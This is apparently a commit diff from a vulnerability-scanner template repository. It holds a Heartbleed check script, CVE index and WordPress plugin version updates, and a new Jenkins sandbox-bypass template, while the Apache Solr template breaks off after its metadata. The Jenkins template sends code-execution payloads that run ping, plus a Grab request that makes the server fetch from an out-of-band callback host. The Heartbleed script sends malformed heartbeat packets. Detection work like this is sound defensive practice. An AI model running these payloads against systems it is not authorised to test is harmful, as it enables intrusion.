00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c
c0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09
c0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44
c0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c
c0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11
00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04
03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19
00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08
00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13
00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00
00 0f 00 01 01
''')
hb = h2bin('''
18 03 02 00 03
01 40 00
''')
def recvall(s, length, timeout=5):
endtime = time.time() + timeout
rdata = b''
remain = length
while remain > 0:
rtime = endtime - time.time()
if rtime < 0:
return None
r, _, _ = select.select([s], [], [], 5)
if s in r:
data = s.recv(remain)
if not data:
return None
rdata += data
remain -= len(data)
return rdata
def recvmsg(s):
hdr = recvall(s, 5)
if hdr is None:
return None, None, None
typ, ver, ln = struct.unpack('>BHH', hdr)
pay = recvall(s, ln, 10)
if pay is None:
return None, None, None
return typ, ver, pay
def hit_hb(s):
s.send(hb)
while True:
typ, ver, pay = recvmsg(s)
if typ is None:
return False
if typ == 24: # Heartbeat response
if len(pay) > 3:
print('server is vulnerable')
return True
return False
if typ == 21: # Server alert
return False
def main():
# Get the URL from the environment variable
url = os.getenv('url')
if not url:
print("URL environment variable is not set.")
return
# Parse the URL
parsed_url = urlparse(url)
host = parsed_url.hostname
port = parsed_url.port if parsed_url.port else 443
if not host:
return
# Create a socket connection
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
# Send Client Hello
s.send(hello)
# Wait for Server Hello
while True:
typ, ver, pay = recvmsg(s)
if typ is None:
return
if typ == 22 and pay[0] == 0x0E: # Server hello done
break
# Send Heartbeat request and check vulnerability
s.send(hb)
hit_hb(s)
if __name__ == '__main__':
main()
matchers:
- type: dsl
dsl:
- "contains(response,'server is vulnerable')"
# digest: 4a0a004730450221009dd56203fe8a75e8d69026162da7c8d74639d3b0002df5712f0e5d96d6be9e890220475807dc2322d0c2eeab4648a8424cdac2a8b67794c062aec537096e033c7c5a:922c64590222798bb761d5b6d8e72950

10
contributors.json
View File

@ -1469,5 +1469,15 @@
"email": ""
}
},
{
"author": "jpg0mez",
"links": {
"github": "https://github.com/JPG0mez",
"twitter": "https://twitter.com/jpgp__",
"linkedin": "https://www.linkedin.com/in/juan-pablo-gomez-postigo-173a0b163/",
"website": "",
"email": ""
}
}
]

6
cves.json
View File

@ -377,6 +377,7 @@
{"ID":"CVE-2016-7834","Info":{"Name":"Sony IPELA Engine IP Camera - Hardcoded Account","Severity":"high","Description":"Multiple SONY network cameras are vulnerable to sensitive information disclosure via hardcoded credentials.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2016/CVE-2016-7834.yaml"}
{"ID":"CVE-2016-7981","Info":{"Name":"SPIP \u003c3.1.2 - Cross-Site Scripting","Severity":"medium","Description":"SPIP 3.1.2 and earlier contains a cross-site scripting vulnerability in valider_xml.php which allows remote attackers to inject arbitrary web script or HTML via the var_url parameter in a valider_xml action.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2016/CVE-2016-7981.yaml"}
{"ID":"CVE-2016-8527","Info":{"Name":"Aruba Airwave \u003c8.2.3.1 - Cross-Site Scripting","Severity":"medium","Description":"Aruba Airwave before version 8.2.3.1 is vulnerable to reflected cross-site scripting.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2016/CVE-2016-8527.yaml"}
{"ID":"CVE-2016-9299","Info":{"Name":"Jenkins CLI - HTTP Java Deserialization","Severity":"critical","Description":"The remoting module in Jenkins before 2.32 and LTS before 2.19.3 allows remote attackers to execute arbitrary code via a crafted serialized Java object, which triggers an LDAP query to a third-party server.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2016/CVE-2016-9299.yaml"}
{"ID":"CVE-2017-0929","Info":{"Name":"DotNetNuke (DNN) ImageHandler \u003c9.2.0 - Server-Side Request Forgery","Severity":"high","Description":"DotNetNuke (aka DNN) before 9.2.0 suffers from a server-side request forgery vulnerability in the DnnImageHandler class. Attackers may be able to access information about internal network resources.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2017/CVE-2017-0929.yaml"}
{"ID":"CVE-2017-1000028","Info":{"Name":"Oracle GlassFish Server Open Source Edition 4.1 - Local File Inclusion","Severity":"high","Description":"Oracle GlassFish Server Open Source Edition 4.1 is vulnerable to both authenticated and unauthenticated local file inclusion vulnerabilities that can be exploited by issuing specially crafted HTTP GET requests.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2017/CVE-2017-1000028.yaml"}
{"ID":"CVE-2017-1000029","Info":{"Name":"Oracle GlassFish Server Open Source Edition 3.0.1 - Local File Inclusion","Severity":"high","Description":"Oracle GlassFish Server Open Source Edition 3.0.1 (build 22) is vulnerable to unauthenticated local file inclusion vulnerabilities that allow remote attackers to request arbitrary files on the server.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2017/CVE-2017-1000029.yaml"}
@ -661,6 +662,7 @@
{"ID":"CVE-2019-0221","Info":{"Name":"Apache Tomcat - Cross-Site Scripting","Severity":"medium","Description":"Apache Tomcat 9.0.0.M1 to 9.0.0.17, 8.5.0 to 8.5.39, and 7.0.0 to 7.0.93 are vulnerable to cross-site scripting because the SSI printenv command echoes user provided data without escaping. Note: SSI is disabled by default. The printenv command is intended for debugging and is unlikely to be present in a production website.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2019/CVE-2019-0221.yaml"}
{"ID":"CVE-2019-0230","Info":{"Name":"Apache Struts \u003c=2.5.20 - Remote Code Execution","Severity":"critical","Description":"Apache Struts 2.0.0 to 2.5.20 forced double OGNL evaluation when evaluated on raw user input in tag attributes, which may lead to remote code execution.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2019/CVE-2019-0230.yaml"}
{"ID":"CVE-2019-0232","Info":{"Name":"Apache Tomcat `CGIServlet` enableCmdLineArguments - Remote Code Execution","Severity":"high","Description":"When running on Windows with enableCmdLineArguments enabled, the CGI Servlet in Apache Tomcat 9.0.0.M1 to 9.0.17, 8.5.0 to 8.5.39 and 7.0.0 to 7.0.93 is vulnerable to Remote Code Execution due to a bug in the way the JRE passes command line arguments to Windows. The CGI Servlet is disabled by default. The CGI option enableCmdLineArguments is disable by default in Tomcat 9.0.x (and will be disabled by default in all versions in response to this vulnerability). For a detailed explanation of the JRE behaviour, see Markus Wulftange's blog (https-//codewhitesec.blogspot.com/2016/02/java-and-command-line-injections-in-windows.html) and this archived MSDN blog (https-//web.archive.org/web/20161228144344/https-//blogs.msdn.microsoft.com/twistylittlepassagesallalike/2011/04/23/everyone-quotes-command-line-arguments-the-wrong-way/).\n","Classification":{"CVSSScore":"8.1"}},"file_path":"http/cves/2019/CVE-2019-0232.yaml"}
{"ID":"CVE-2019-1003000","Info":{"Name":"Jenkins Script Security Plugin \u003c=1.49 - Sandbox Bypass","Severity":"high","Description":"A sandbox bypass vulnerability exists in the Jenkins Script Security Plugin (versions 1.49 and earlier) within src/main/java/org/jenkinsci/plugins/scriptsecurity/sandbox/groovy/GroovySandbox.java. This flaw allows attackers with permission to submit sandboxed scripts to execute arbitrary code on the Jenkins master JVM, potentially compromising the entire Jenkins environment.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2019/CVE-2019-1003000.yaml"}
{"ID":"CVE-2019-10068","Info":{"Name":"Kentico CMS Insecure Deserialization Remote Code Execution","Severity":"critical","Description":"Kentico CMS is susceptible to remote code execution via a .NET deserialization vulnerability.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2019/CVE-2019-10068.yaml"}
{"ID":"CVE-2019-10092","Info":{"Name":"Apache HTTP Server \u003c=2.4.39 - HTML Injection/Partial Cross-Site Scripting","Severity":"medium","Description":"Apache HTTP Server versions 2.4.0 through 2.4.39 are vulnerable to a limited cross-site scripting issue affecting the mod_proxy error page. An attacker could cause the link on the error page to be malformed and instead point to a page of their choice. This would only be exploitable where a server was set up with proxying enabled but was misconfigured in such a way that the Proxy Error page was displayed.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2019/CVE-2019-10092.yaml"}
{"ID":"CVE-2019-10098","Info":{"Name":"Apache HTTP server v2.4.0 to v2.4.39 - Open Redirect","Severity":"medium","Description":"In Apache HTTP server 2.4.0 to 2.4.39, Redirects configured with mod_rewrite that were intended to be self-referential might be fooled by encoded newlines and redirect instead to an unexpected URL within the request URL.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2019/CVE-2019-10098.yaml"}
@ -2449,7 +2451,6 @@
{"ID":"CVE-2023-6977","Info":{"Name":"Mlflow \u003c2.8.0 - Local File Inclusion","Severity":"high","Description":"Mlflow before 2.8.0 is susceptible to local file inclusion due to path traversal in GitHub repository mlflow/mlflow. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-6977.yaml"}
{"ID":"CVE-2023-6989","Info":{"Name":"Shield Security WP Plugin \u003c= 18.5.9 - Local File Inclusion","Severity":"critical","Description":"The Shield Security Smart Bot Blocking \u0026 Intrusion Prevention Security plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 18.5.9 via the render_action_template parameter. This makes it possible for unauthenticated attacker to include and execute PHP files on the server, allowing the execution of any PHP code in those files.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-6989.yaml"}
{"ID":"CVE-2023-7028","Info":{"Name":"GitLab - Account Takeover via Password Reset","Severity":"high","Description":"An issue has been discovered in GitLab CE/EE affecting all versions from 16.1 prior to 16.1.6, 16.2 prior to 16.2.9, 16.3 prior to 16.3.7, 16.4 prior to 16.4.5, 16.5 prior to 16.5.6, 16.6 prior to 16.6.4, and 16.7 prior to 16.7.2 in which user account password reset emails could be delivered to an unverified email address.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-7028.yaml"}
{"ID":"CVE-2016-9299","Info":{"Name":"Jenkins CLI - HTTP Java Deserialization","Severity":"critical","Description":"The remoting module in Jenkins before 2.32 and LTS before 2.19.3 allows remote attackers to execute arbitrary code via a crafted serialized Java object, which triggers an LDAP query to a third-party server.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2016-9299.yaml"}
{"ID":"CVE-2024-0195","Info":{"Name":"SpiderFlow Crawler Platform - Remote Code Execution","Severity":"critical","Description":"A vulnerability, which was classified as critical, was found in spider-flow 0.4.3. Affected is the function FunctionService.saveFunction of the file src/main/java/org/spiderflow/controller/FunctionController.java. The manipulation leads to code injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-249510 is the identifier assigned to this vulnerability.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-0195.yaml"}
{"ID":"CVE-2024-0200","Info":{"Name":"Github Enterprise Authenticated Remote Code Execution","Severity":"critical","Description":"An unsafe reflection vulnerability was identified in GitHub Enterprise Server that could lead to reflection injection. This vulnerability could lead to the execution of user-controlled methods and remote code execution. To exploit this bug, an actor would need to be logged into an account on the GHES instance with the organization owner role. This vulnerability affected all versions of GitHub Enterprise Server prior to 3.12 and was fixed in versions 3.8.13, 3.9.8, 3.10.5, and 3.11.3.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-0200.yaml"}
{"ID":"CVE-2024-0204","Info":{"Name":"Fortra GoAnywhere MFT - Authentication Bypass","Severity":"critical","Description":"Authentication bypass in Fortra's GoAnywhere MFT prior to 7.4.1 allows an unauthorized user to create an admin user via the administration portal.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-0204.yaml"}
@ -2634,6 +2635,7 @@
{"ID":"CVE-2024-4443","Info":{"Name":"Business Directory Plugin \u003c= 6.4.2 - SQL Injection","Severity":"critical","Description":"The Business Directory Plugin Easy Listing Directories for WordPress plugin for WordPress is vulnerable to time-based SQL Injection via the listingfields parameter in all versions up to, and including, 6.4.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-4443.yaml"}
{"ID":"CVE-2024-44849","Info":{"Name":"Qualitor \u003c= 8.24 - Remote Code Execution","Severity":"critical","Description":"Qualitor up to 8.24 is vulnerable to Remote Code Execution (RCE) via Arbitrary File Upload in checkAcesso.php.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-44849.yaml"}
{"ID":"CVE-2024-45195","Info":{"Name":"Apache OFBiz - Remote Code Execution","Severity":"high","Description":"Apache OFBiz below 18.12.16 is vulnerable to unauthenticated remote code execution on Linux and Windows. An attacker with no valid credentials can exploit missing view authorization checks in the web application to execute arbitrary code on the server\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-45195.yaml"}
{"ID":"CVE-2024-45216","Info":{"Name":"Apache Solr - Authentication Bypass","Severity":"critical","Description":"Solr instances using the PKIAuthenticationPlugin, which is enabled by default when Solr Authentication is used, are vulnerable to Authentication bypass.A fake ending at the end of any Solr API URL path, will allow requests to skip Authentication while maintaining the API contract with the original URL Path.This fake ending looks like an unprotected API path, however it is stripped off internally after authentication but before API routing.This issue affects Apache Solr- from 5.3.0 before 8.11.4, from 9.0.0 before 9.7.0.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-45216.yaml"}
{"ID":"CVE-2024-45241","Info":{"Name":"CentralSquare CryWolf - Path Traversal","Severity":"high","Description":"A traversal vulnerability in GeneralDocs.aspx in CentralSquare CryWolf (False Alarm Management) through 2024-08-09 allows unauthenticated attackers to read files outside of the working web directory via the rpt parameter, leading to the disclosure of sensitive information.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-45241.yaml"}
{"ID":"CVE-2024-45388","Info":{"Name":"Hoverfly \u003c 1.10.3 - Arbitrary File Read","Severity":"high","Description":"Hoverfly is a lightweight service virtualization/ API simulation / API mocking tool for developers and testers. The /api/v2/simulation POST handler allows users to create new simulation views from the contents of a user-specified file. This feature can be abused by an attacker to read arbitrary files from the Hoverfly server.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-45388.yaml"}
{"ID":"CVE-2024-45440","Info":{"Name":"Drupal 11.x-dev - Full Path Disclosure","Severity":"medium","Description":"core/authorize.php in Drupal 11.x-dev allows Full Path Disclosure (even when error logging is None) if the value of hash_salt is file_get_contents of a file that does not exist.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-45440.yaml"}
@ -2646,6 +2648,7 @@
{"ID":"CVE-2024-46986","Info":{"Name":"Camaleon CMS \u003c 2.8.1 Arbitrary File Write to RCE","Severity":"critical","Description":"An arbitrary file write vulnerability accessible via the upload method of the MediaController allows authenticated users to write arbitrary files to any location on the web server Camaleon CMS is running on (depending on the permissions of the underlying filesystem). E.g. This can lead to a remote code execution in case an attacker is able to write a Ruby file into the config/initializers/ subfolder of the Ruby on Rails application\n","Classification":{"CVSSScore":"9.9"}},"file_path":"http/cves/2024/CVE-2024-46986.yaml"}
{"ID":"CVE-2024-47062","Info":{"Name":"Navidrome \u003c 0.53.0 - Authenticated SQL Injection","Severity":"critical","Description":"Navidrome is an open source web-based music collection server and streamer. Navidrome automatically adds parameters in the URL to SQL queries. This can be exploited to access information by adding parameters like `password=...` in the URL (ORM Leak). Furthermore, the names of the parameters are not properly escaped, leading to SQL Injections. Finally, the username is used in a `LIKE` statement, allowing people to log in with `%` instead of their username. When adding parameters to the URL, they are automatically included in an SQL `LIKE` statement (depending on the parameter's name). This allows attackers to potentially retrieve arbitrary information. For example, attackers can use the following request to test whether some encrypted passwords start with `AAA`. This results in an SQL query like `password LIKE 'AAA%'`, allowing attackers to slowly brute-force passwords. When adding parameters to the URL, they are automatically added to an SQL query. The names of the parameters are not properly escaped. This behavior can be used to inject arbitrary SQL code (SQL Injection). These vulnerabilities can be used to leak information and dump the contents of the database and have been addressed in release version 0.53.0. Users are advised to upgrade. There are no known workarounds for this vulnerability.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-47062.yaml"}
{"ID":"CVE-2024-4836","Info":{"Name":"Edito CMS - Sensitive Data Leak","Severity":"high","Description":"Web services managed by Edito CMS (Content Management System) in versions from 3.5 through 3.25 leak sensitive data as they allow downloading configuration files by an unauthorized user.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-4836.yaml"}
{"ID":"CVE-2024-4841","Info":{"Name":"LoLLMS WebUI - Subfolder Prediction via Path Traversal","Severity":"medium","Description":"A Path Traversal vulnerability exists in the parisneo/lollms-webui, specifically within the 'add_reference_to_local_mode' function due to the lack of input sanitization. This vulnerability affects versions v9.6 to the latest.\n","Classification":{"CVSSScore":"4"}},"file_path":"http/cves/2024/CVE-2024-4841.yaml"}
{"ID":"CVE-2024-4879","Info":{"Name":"ServiceNow UI Macros - Template Injection","Severity":"unknown","Description":"ServiceNow has addressed an input validation vulnerability that was identified in Vancouver and Washington DC Now Platform releases. This vulnerability could enable an unauthenticated user to remotely execute code within the context of the Now Platform. ServiceNow applied an update to hosted instances, and ServiceNow released the update to our partners and self-hosted customers. Listed below are the patches and hot fixes that address the vulnerability. If you have not done so already, we recommend applying security patches relevant to your instance as soon as possible.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-4879.yaml"}
{"ID":"CVE-2024-4885","Info":{"Name":"Progress Software WhatsUp Gold GetFileWithoutZip Directory Traversal - Remote Code Execution","Severity":"critical","Description":"This vulnerability allows remote attackers to execute arbitrary code on affected installations of Progress Software WhatsUp Gold. Authentication is not required to exploit this vulnerability.\nThe specific flaw exists within the implementation of GetFileWithoutZip method. The issue results from the lack of proper validation of a user-supplied path prior to using it in file operations. An attacker can leverage this vulnerability to execute code in the context of the service account.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-4885.yaml"}
{"ID":"CVE-2024-48914","Info":{"Name":"Vendure - Arbitrary File Read","Severity":"critical","Description":"Vendure is an open-source headless commerce platform. Prior to versions 3.0.5 and 2.3.3, a vulnerability in Vendure's asset server plugin allows an attacker to craft a request which is able to traverse the server file system and retrieve the contents of arbitrary files, including sensitive data such as configuration files, environment variables, and other critical data stored on the server. In the same code path is an additional vector for crashing the server via a malformed URI.\n","Classification":{"CVSSScore":"9.1"}},"file_path":"http/cves/2024/CVE-2024-48914.yaml"}
@ -2676,6 +2679,7 @@
{"ID":"CVE-2024-6289","Info":{"Name":"WPS Hide Login \u003c 1.9.16.4 - Hidden Login Page Disclosure","Severity":"medium","Description":"The WPS Hide Login WordPress plugin before 1.9.16.4 does not prevent redirects to the login page via the auth_redirect WordPress function, allowing an unauthenticated visitor to access the hidden login page.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-6289.yaml"}
{"ID":"CVE-2024-6366","Info":{"Name":"User Profile Builder \u003c 3.11.8 - File Upload","Severity":"high","Description":"The User Profile Builder WordPress plugin before 3.11.8 does not have proper authorisation, allowing unauthenticated users to upload media files via the async upload functionality of WP.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-6366.yaml"}
{"ID":"CVE-2024-6396","Info":{"Name":"Aimhubio Aim Server 3.19.3 - Arbitrary File Overwrite","Severity":"critical","Description":"A vulnerability in the `_backup_run` function in aimhubio/aim version 3.19.3 allows remote attackers to overwrite any file on the host server and exfiltrate arbitrary data. The vulnerability arises due to improper handling of the `run_hash` and `repo.path` parameters, which can be manipulated to create and write to arbitrary file paths. This can lead to denial of service by overwriting critical system files, loss of private data, and potential remote code execution.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-6396.yaml"}
{"ID":"CVE-2024-6420","Info":{"Name":"Hide My WP Ghost \u003c 5.2.02 - Hidden Login Page Disclosure","Severity":"high","Description":"The Hide My WP Ghost plugin does not prevent redirects to the login page via the auth_redirect WordPress function, allowing an unauthenticated visitor to access the hidden login page.\n","Classification":{"CVSSScore":"8.6"}},"file_path":"http/cves/2024/CVE-2024-6420.yaml"}
{"ID":"CVE-2024-6517","Info":{"Name":"Contact Form 7 Math Captcha \u003c= 2.0.1 - Cross-site Scripting","Severity":"medium","Description":"The Contact Form 7 Math Captcha WordPress plugin through 2.0.1 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2024/CVE-2024-6517.yaml"}
{"ID":"CVE-2024-6586","Info":{"Name":"Lightdash v0.1024.6 - Server-Side Request Forgery","Severity":"high","Description":"Server-Side Request Forgery (“SSRF”) in the export dashboard functionality of Lightdash version 0.1024.6 allows remote authenticated threat actors to obtain the session cookie of any user who exports a crafted dashboard. When they are exported, dashboards containing HTML elements can trigger HTTP requests to an external domain that contain the exporting users session cookie. The cookie could be stolen by a threat actor and used to hijack application user sessions.\n","Classification":{"CVSSScore":"7.3"}},"file_path":"http/cves/2024/CVE-2024-6586.yaml"}
{"ID":"CVE-2024-6587","Info":{"Name":"LiteLLM - Server-Side Request Forgery","Severity":"high","Description":"LiteLLM vulnerable to Server-Side Request Forgery (SSRF) vulnerability Exposes OpenAI API Keys.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-6587.yaml"}

2
cves.json-checksum.txt
View File

@ -1 +1 @@
f95ff9c55f4996a2780c830e4149e7b7
834a3ed8fe3e7171d2135982772985b0

1
helpers/wordlists/wordpress-plugins.txt
View File

@ -12039,7 +12039,6 @@ burnmans-diaspora-button
burnmans-subjot-button
burnzone-commenting
burping-the-corpse-sidebar-widget
burst-statistics
burstn-for-wordpress
burstpay-woocommerce
bury-admin-bar

2
helpers/wordpress/plugins/advanced-custom-fields.txt
View File

@ -1 +1 @@
6.3.9
6.3.10.2

2
helpers/wordpress/plugins/breeze.txt
View File

@ -1 +1 @@
2.1.17
2.1.18

2
helpers/wordpress/plugins/disable-gutenberg.txt
View File

@ -1 +1 @@
3.2.1
3.2.2

2
helpers/wordpress/plugins/ewww-image-optimizer.txt
View File

@ -1 +1 @@
7.9.0
7.9.1

2
helpers/wordpress/plugins/ga-google-analytics.txt
View File

@ -1 +1 @@
20241019
20241102

2
helpers/wordpress/plugins/google-analytics-dashboard-for-wp.txt
View File

@ -1 +1 @@
8.2.0
8.2.1

2
helpers/wordpress/plugins/google-analytics-for-wordpress.txt
View File

@ -1 +1 @@
9.2.0
9.2.1

2
helpers/wordpress/plugins/gutenberg.txt
View File

@ -1 +1 @@
19.5.0
19.5.1

2
helpers/wordpress/plugins/mailpoet.txt
View File

@ -1 +1 @@
5.3.4
5.3.5

2
helpers/wordpress/plugins/meta-box.txt
View File

@ -1 +1 @@
5.10.2
5.10.3

2
helpers/wordpress/plugins/premium-addons-for-elementor.txt
View File

@ -1 +1 @@
4.10.61
4.10.62

2
helpers/wordpress/plugins/royal-elementor-addons.txt
View File

@ -1 +1 @@
1.7.1
1.7.1001

2
helpers/wordpress/plugins/seo-by-rank-math.txt
View File

@ -1 +1 @@
1.0.230
1.0.231

2
helpers/wordpress/plugins/the-events-calendar.txt
View File

@ -1 +1 @@
6.7.1
6.8.0

2
helpers/wordpress/plugins/ultimate-addons-for-gutenberg.txt
View File

@ -1 +1 @@
2.16.2
2.16.3

2
helpers/wordpress/plugins/yith-woocommerce-wishlist.txt
View File

@ -1 +1 @@
4.0.0
4.0.1

0
http/cves/2024/CVE-2016-9299.yaml → http/cves/2016/CVE-2016-9299.yaml
View File

99
http/cves/2019/CVE-2019-1003000.yaml Normal file
View File

@ -0,0 +1,99 @@
id: CVE-2019-1003000
info:
name: Jenkins Script Security Plugin <=1.49 - Sandbox Bypass
author: sttlr
severity: high
description: |
A sandbox bypass vulnerability exists in the Jenkins Script Security Plugin (versions 1.49 and earlier) within src/main/java/org/jenkinsci/plugins/scriptsecurity/sandbox/groovy/GroovySandbox.java. This flaw allows attackers with permission to submit sandboxed scripts to execute arbitrary code on the Jenkins master JVM, potentially compromising the entire Jenkins environment.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
cve-id: CVE-2019-1003000
cpe: cpe:2.3:a:jenkins:script_security::::::jenkins::*
reference:
- https://jenkins.io/security/advisory/2019-01-08/#SECURITY-1266
- http://www.rapid7.com/db/modules/exploit/multi/http/jenkins_metaprogramming
- https://github.com/slowmistio/CVE-2019-1003000-and-CVE-2018-1999002-Pre-Auth-RCE-Jenkins
- https://github.com/1NTheKut/CVE-2019-1003000_RCE-DETECTION
- https://github.com/purple-WL/Jenkins_CVE-2019-1003000
- https://github.com/adamyordan/cve-2019-1003000-jenkins-rce-poc
metadata:
verified: true
max-request: 6
vendor: jenkins
product: script_security
tags: cve,cve2019,jenkins,oast,bypass,sandbox-bypass,authenticated
variables:
username: admin
vendor_name: "{{rand_text_alpha(3)}}.{{rand_text_alpha(5)}}"
app_name: "{{rand_text_alpha(8)}}"
flow: http(1) && http(2) && (http(3) || http(4))
http:
- raw:
- |
GET /login HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
part: body
words:
- "jenkins"
internal: true
case-insensitive: true
- raw:
- |
POST /j_acegi_security_check HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
j_username={{username}}&j_password={{password}}&from=%2F&Submit=Sign+in
- |
GET / HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains_all(tolower(body_2), "jenkins", "/logout")'
internal: true
- raw:
- |
GET /securityRealm/user/{{to_lower(username)}}/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value=public%20class%20{{app_name}}{public%20{{app_name}}(){%22ping%20-c%202%20{{interactsh-url}}%22.execute()}} HTTP/1.1
Host: {{Hostname}}
- |
GET /securityRealm/user/{{to_lower(username)}}/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value=public%20class%20{{app_name}}{public%20{{app_name}}(){%22ping%20-n%202%20{{interactsh-url}}%22.execute()}} HTTP/1.1
Host: {{Hostname}}
stop-at-first-match: true
matchers:
- type: word
part: interactsh_protocol
words:
- "dns"
- raw:
- |
GET /securityRealm/user/{{to_lower(username)}}/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(%27http%3a%2f%2f{{interactsh-url}}%2f%27)%0a@Grab(%27{{vendor_name}}:{{app_name}}:1%27)%0aimport%20{{app_name}}; HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "http"
- type: word
part: interactsh_request
words:
- "/{{replace(vendor_name, '.', '/')}}/{{app_name}}/1/{{app_name}}-1.pom"
# digest: 4b0a0048304602210085a1faf7a3de1a102f1ab5fde71db42124776cb68e66f315bdaa1a141107750b0221008549adaf38ad9247d2a2c9a8ea35e4672abe0f3ebe12c70656f9d4b465180de8:922c64590222798bb761d5b6d8e72950

4
http/cves/2023/CVE-2023-43373.yaml
View File

@ -29,6 +29,8 @@ info:
shodan-query: title:"hoteldruid"
tags: cve,cve2023,hoteldruid,sqli
flow: http(1) && http(2)
http:
- raw:
- |
@ -75,4 +77,4 @@ http:
- 'duration>=7'
- 'status_code == 200'
condition: and
# digest: 490a004630440220426178e5e13df0a4daa682781ac97854701957df13929ffa4be8d50718e1bf9502203b84b0e0d9ca568e80cc134cdf687fd31a671acb7ce058711350479d847a98d1:922c64590222798bb761d5b6d8e72950
# digest: 490a00463044022030ef02bb52bc805a7e33565d8aa7d9f01ab2cf69c50588e3c11da240c7f0649f022005aef1f95560a51cf024af4198c11a1dee30147872075fe058d0b6ec6ea403d4:922c64590222798bb761d5b6d8e72950

54
http/cves/2024/CVE-2024-45216.yaml Normal file
View File

@ -0,0 +1,54 @@
id: CVE-2024-45216
info:
name: Apache Solr - Authentication Bypass
author: gumgum
severity: critical
description: |
Solr instances using the PKIAuthenticationPlugin, which is enabled by default when Solr Authentication is used, are vulnerable to Authentication bypass.A fake ending at the end of any Solr API URL path, will allow requests to skip Authentication while maintaining the API contract with the original URL Path.This fake ending looks like an unprotected API path, however it is stripped off internally after authentication but before API routing.This issue affects Apache Solr- from 5.3.0 before 8.11.4, from 9.0.0 before 9.7.0.
impact: |
Users are recommended to upgrade to version 9.7.0, or 8.11.4, which fix the issue.
reference:
- https://shfsec.com/cve-2024-45216-authentication-bypass-in-apache-solr
- https://nvd.nist.gov/vuln/detail/CVE-2024-45216
- https://solr.apache.org/security html#cve-2024-45216-apache-solr-authentication-bypass-possible-using-a-fake-url-path-ending
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2024-45216
cwe-id: CWE-863,CWE-287
epss-score: 0.00043
epss-percentile: 0.09834
metadata:
verified: true
max-request: 1
shodan-query: http.html:"Apache Solr"
tags: cve,cve2024,apache,solr,auth-bypass
http:
